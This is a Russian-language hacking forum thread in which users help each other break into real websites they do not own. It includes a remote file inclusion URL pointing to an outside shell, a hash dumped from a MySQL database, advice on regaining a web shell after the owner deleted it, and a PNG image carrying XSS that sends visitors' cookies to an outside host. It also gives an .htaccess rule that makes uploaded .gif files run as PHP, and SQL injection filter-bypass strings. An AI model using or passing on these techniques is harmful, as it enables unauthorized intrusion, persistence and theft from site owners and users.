Ваши вопросы по уязвимостям.

n0ne там стоит винда и пусть к смд я подобрал. вопрос как эксплуатировать смд через вэб интерфейс. Windows/System32/cmd.exe?/c+dir+c:\ не работает. Я спросил есть ли ещё варианты читай внимательней.

 

Чтение еще не значит исполнение. Возможно, там только инклуд. Попробуй заюзать что-то типа
http://site.ru/?page=http://h4x0r.net/shell.php

 

Какая версия бд?

 

Что за тип хэша *02A4DF6067015EA7070ACE86D62DE48C0BCADA75?
Слил с mysql 4.1.22.

 

sha-1

 

проблемы с доступом к серверу

в общем, описываю ситуацию с самого начала.

был доступ к серву посредсвам шела, потом поимел доступ к бд итд
когда холдер заметил мое появление удалил все шелы.
залил заново, но теперь шел не запускается (пробовал разные).
видимо чтото с обработкой пхп. При запросе к пхп файлам вылазит пустая страница(в сорсах- хтмл=боди-боди-хтмл)
остался доступ к админке- заливаю без проблем, но редактить нельзя.
с БД тоже самое- просто вылазит пустая страница (с других ипов не пускает, сам прописывал свой ип в конфигах)
к записи в админке разрешены следующие форматы
txt, php, gif, jpg, xls, mdb, csv, rar, zip, css, doc, chm, pdf

Что сейчас можно сделать чтобы снова доступ получить? И что вообще холдер сделал?

 

prozorov, Залей какой-нить скрипт для работы с бд на пхп и проверь работает ли, и просто <? echo 'henk'; ?>, и напиши результаты.

 

к примеру мог в папку куда все льется положить хтакцес с php_flag engine off

 

подходящих скриптов не нашел, но вроде обрабатывает
<? echo 'henk'; ?> тоже обрабатывает

хтакцес с php_flag engine off

может быть, я проверил все папки- результат один

кста, на сайте форум был, тоже работать перестал

 

нашел xss на сайте залив картинку png c таким содержанием

Code:

‰PNG         IHDR   
   
   Д‰   
sRGB ®Ой   gAMA  ±Џьa    cHRM  z&  Ђ„  ъ   Ђи  u0  к`  :˜  pњєQ<   	pHYs    
 љњ   IDATWcш 	ыэ+ХE    IEND®B`‚<html>  <script>alert(/by_blabla_/)</script><script>img = new Image();  img.src = "http://s.netsec.ru/absent09.gif?"+document.cookie;</script>  </html> z&  Ђ„  ъ   Ђи  u0  к`  :˜  pњєQ<   	pHYs    
 љњ   IDATWcш 	ыэ+ХE    IEND®B`‚

напрашивается вопрос можно ли вставить шелл вместо <html> <script>alert(/by_blabal_/)</script><script>img = new Image(); img.src = "http://s.netsec.ru/absent09.gif?"+document.cookie;</script> </html> ?

я вставляю вместо этого код шелла а когда запускаю такое чувство будто php не работает =(

 

нет, xss выполняется на стороне клиента. пхп код который ты вставляешь тоже только показывается юзеру, но не выполняется на самом сервере

 

prozorov у тя safe mode on скорее всего с safe_mode_gid(on)

to MSDEN

по пробуй залить это

PHP:

<Files "s.gif">
AddType application/x-httpd-php .gif
</Files>

и залить картинку с шеллом.


 

gibson, я в этом чуть чуть чайнег
<Files "s.gif">
AddType application/x-httpd-php .gif
</Files> залить в виде чего? как второй файл чтоли?
а какртинку с шеллом как залить? просто у шелла разрешение поменять?
если нетрудно дай аську

 

это текст в файле .htaccess (тип настройка в апаче). Этот файл говорит апачу, чтобы расшширение ГИФ он воспринимал как скрипт.

Как залить? ЕСли у тя там проверка тока по расширению, то поменяй просто расширение. а если по типу, то допиши шелл в конец картинки. (ну например в свойствах в поле exif впиши)

 

prozorov, в каком плане обрабатываеца? Работает или нет? я про echo.

 

работает, на страницу вывелось henk

 

prozorov, _ttp://webfile.ru/1810388

Попорбуй этот скрипт запустить

 

спс,
скрипт работает, но конеекта нет

 

нашел инъекцию, знаю таблицы,поля и т.п., на
1,version(),3/* отвечает положительно, но если добавить from то сразу вылетает ошибка что скрипт небезопасный,т.е. фильтруют. как решить?hex ?

 

2 bad
FroM
%66%72%6f%6d
%25%36%36%25%37%32%25%36%46%25%36%44
f/**/r/**/o/**/m
Варианты from ,но может и не проскочить